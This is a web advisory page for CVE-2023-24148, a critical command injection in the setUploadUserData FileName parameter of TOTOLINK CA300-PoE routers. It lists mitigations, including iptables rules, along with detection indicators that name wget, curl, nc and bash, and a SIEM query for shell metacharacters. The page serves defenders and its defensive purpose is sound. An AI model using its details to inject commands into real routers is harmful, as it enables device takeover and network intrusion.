Login Sign Up

CVE-2023-24148

9.8 CRITICAL
Remote Code Execution

📋 TL;DR

This vulnerability allows remote attackers to execute arbitrary commands on TOTOLINK CA300-PoE routers by injecting malicious commands into the FileName parameter of the setUploadUserData function. Attackers can gain full control of affected devices, potentially compromising network security. All users of TOTOLINK CA300-PoE V6.2c.884 are affected.

💻 Affected Systems

Products:
  • TOTOLINK CA300-PoE
Versions: V6.2c.884
Operating Systems: Embedded Linux
Default Config Vulnerable: ⚠️ Yes
Notes: Affects the web management interface. No special configuration required for exploitation.

📦 What is this software?

Ca300 Poe Firmware by Totolink

View all CVEs affecting Ca300 Poe Firmware →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete device takeover leading to network compromise, data exfiltration, lateral movement to other systems, and persistent backdoor installation.

🟠

Likely Case

Remote code execution allowing attackers to modify device configuration, intercept network traffic, or use the device as a foothold for further attacks.

🟢

If Mitigated

Limited impact if device is isolated from critical networks and has strict network access controls.

🌐 Internet-Facing: HIGH
🏢 Internal Only: HIGH

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ⚠️ Yes
Complexity: LOW

Public exploit code available in GitHub repository. Simple HTTP request with command injection payload required.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: Unknown

Vendor Advisory: Unknown

Restart Required: No

Instructions:

No official patch available. Check TOTOLINK website for firmware updates. If update available, download from official source and apply through web interface.

🔧 Temporary Workarounds

Network Isolation

linux

Restrict access to device management interface

iptables -A INPUT -p tcp --dport 80 -s TRUSTED_IP -j ACCEPT
iptables -A INPUT -p tcp --dport 80 -j DROP

Disable Web Interface

all

Disable HTTP management if not required

telnet/ssh to device and disable httpd service if supported

🧯 If You Can't Patch

  • Segment affected devices in isolated VLAN with strict firewall rules
  • Implement network monitoring for suspicious traffic to/from affected devices

🔍 How to Verify

Check if Vulnerable:

Check device firmware version in web interface. If version is V6.2c.884, device is vulnerable.

Check Version:

curl -s http://device-ip/version or check web interface

Verify Fix Applied:

Check if firmware version has been updated to a version later than V6.2c.884

📡 Detection & Monitoring

Log Indicators:

  • Unusual POST requests to setUploadUserData endpoint
  • Commands like 'wget', 'curl', 'nc', 'bash' in URL parameters

Network Indicators:

  • HTTP requests with shell metacharacters in parameters
  • Outbound connections from device to unexpected destinations

SIEM Query:

http.url:*setUploadUserData* AND (http.uri:*;* OR http.uri:*|* OR http.uri:*`* OR http.uri:*$(*)

📊 Metadata

CVE ID: CVE-2023-24148
CVSS v3 Score: 9.8 (CRITICAL)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWE: CWE-77
Published: February 3, 2023
Last Updated: March 26, 2025

🔗 References

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2023-24148, you might also want to check these:

CVE-2024-48841 10.0

This critical vulnerability in FLXEON software allows remote attackers to execute arbitrary code wit...

Same vulnerability type (CWE-77)
CVE-2025-59818 10.0

This vulnerability allows authenticated attackers to execute arbitrary system commands by manipulati...

Same vulnerability type (CWE-77)
CVE-2024-28354 10.0

This is a critical command injection vulnerability in TRENDnet TEW-827DRU routers that allows remote...

Same vulnerability type (CWE-77)